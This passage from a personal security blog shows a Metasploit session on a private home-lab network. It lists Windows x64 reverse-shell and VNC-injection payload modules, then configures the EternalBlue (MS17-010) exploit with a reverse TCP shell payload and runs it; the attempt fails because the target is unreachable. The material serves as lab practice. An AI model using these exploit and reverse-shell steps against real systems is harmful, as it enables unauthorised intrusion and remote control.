payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager<br>   42  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   43  payload&#x2F;windows&#x2F;x64&#x2F;shell&#x2F;reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)<br>   44  payload&#x2F;windows&#x2F;x64&#x2F;shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline<br>   45  payload&#x2F;windows&#x2F;x64&#x2F;shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline<br>   46  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager<br>   47  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support<br>   48  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager<br>   49  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager<br>   50  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)<br>   51  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)<br>   52  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)<br>   53  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)<br>   54  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager<br>   55  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)<br>   56  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)<br>   57  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)<br>   58  payload&#x2F;windows&#x2F;x64&#x2F;vncinject&#x2F;reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)</p>
<p>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; set payload generic&#x2F;shell_reverse_tcp<br>payload &#x3D;&gt; generic&#x2F;shell_reverse_tcp<br>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; set LHOST 192.168.1…<br>LHOST &#x3D;&gt; 192.168.1.1..1<br>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt;  set RHOST 192.168.1…<br>RHOST &#x3D;&gt; 192.168…..03<br>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; show options</p>
<p>Module options (exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue):</p>
<p>   Name          Current Setti  Required  Description<br>                 ng</p>
<hr>
<p>   RHOSTS        192.168.1.103  yes       The target host(s)<br>                                          , see <a target="_blank" rel="noopener" href="https://gith/">https://gith</a><br>                                          ub.com&#x2F;rapid7&#x2F;meta<br>                                          sploit-framework&#x2F;w<br>                                          iki&#x2F;Using-Metasplo<br>                                          it<br>   RPORT         445            yes       The target port (T<br>                                          CP)<br>   SMBDomain                    no        (Optional) The Win<br>                                          dows domain to use<br>                                           for authenticatio<br>                                          n. Only affects Wi<br>                                          ndows Server 2008<br>                                          R2, Windows 7, Win<br>                                          dows Embedded Stan<br>                                          dard 7 target mach<br>                                          ines.<br>   SMBPass                      no        (Optional) The pas<br>                                          sword for the spec<br>                                          ified username<br>   SMBUser                      no        (Optional) The use<br>                                          rname to authentic<br>                                          ate as<br>   VERIFY_ARCH   true           yes       Check if remote ar<br>                                          chitecture matches<br>                                           exploit Target. O<br>                                          nly affects Window<br>                                          s Server 2008 R2,<br>                                          Windows 7, Windows<br>                                           Embedded Standard<br>                                           7 target machines<br>                                          .<br>   VERIFY_TARGE  true           yes       Check if remote OS<br>   T                                       matches exploit T<br>                                          arget. Only affect<br>                                          s Windows Server 2<br>                                          008 R2, Windows 7,<br>                                           Windows Embedded<br>                                          Standard 7 target<br>                                          machines.</p>
<p>Payload options (generic&#x2F;shell_reverse_tcp):</p>
<p>   Name   Current Setting  Required  Description</p>
<hr>
<p>   LHOST  192.168.1.101    yes       The listen address (an<br>                                     interface may be specif<br>                                     ied)<br>   LPORT  4444             yes       The listen port</p>
<p>Exploit target:</p>
<p>   Id  Name</p>
<hr>
<p>   0   Automatic Target</p>
<p>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt; exploit</p>
<p>[-] Handler failed to bind to 192.1…..:4444:-  -<br>[<em>] Started reverse TCP handler on 0.0.0.0:4444<br>[</em>] 192.168.1.103:445 - Using auxiliary&#x2F;scanner&#x2F;smb&#x2F;smb_ms17_010 as check<br>[-] 192.168.1.103:445     - Rex::HostUnreachable: The host (192.168.1.103:445) was unreachable.<br>[<em>] 192.168.1.103:445     - Scanned 1 of 1 hosts (100% complete)<br>[-] 192.168.1.103:445 - The target is not vulnerable.<br>[</em>] Exploit completed, but no session was created.<br>msf6 exploit(windows&#x2F;smb&#x2F;ms17_010_eternalblue) &gt;</p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a href="/josyaaa/2022/05/29/cloud attack/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/josyaaa/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/josyaaa/2022/05/22/how to data set/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2022-05-22 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  &copy; 2022 josyaaa
  
      when meets RED to BLUE ...<a href="https://josyaaa.github.io/" target="_blank">josyaaa's blog</a>,<a href="https://github.com/josyaaa?tab=repositories">josyaaa's github</a><a href="http://getbootstrap.com/" target="_blank"></a><a href="http://getbootstrap.com/" target="_blank"></a>.
     <br> SCDAD/BIG DATA/MALWARE <a href="http://github.com/wzpan/hexo-theme-freemind/"></a> most good at leading tech
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/josyaaa/js/jquery.imagesloaded.min.js"></script>
<script src="/josyaaa/js/gallery.js"></script>
<script src="/josyaaa/js/bootstrap.min.js"></script>
<script src="/josyaaa/js/main.js"></script>
<script src="/josyaaa/js/search.js"></script> 


<link rel="stylesheet" href="/josyaaa/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/josyaaa/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/josyaaa/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
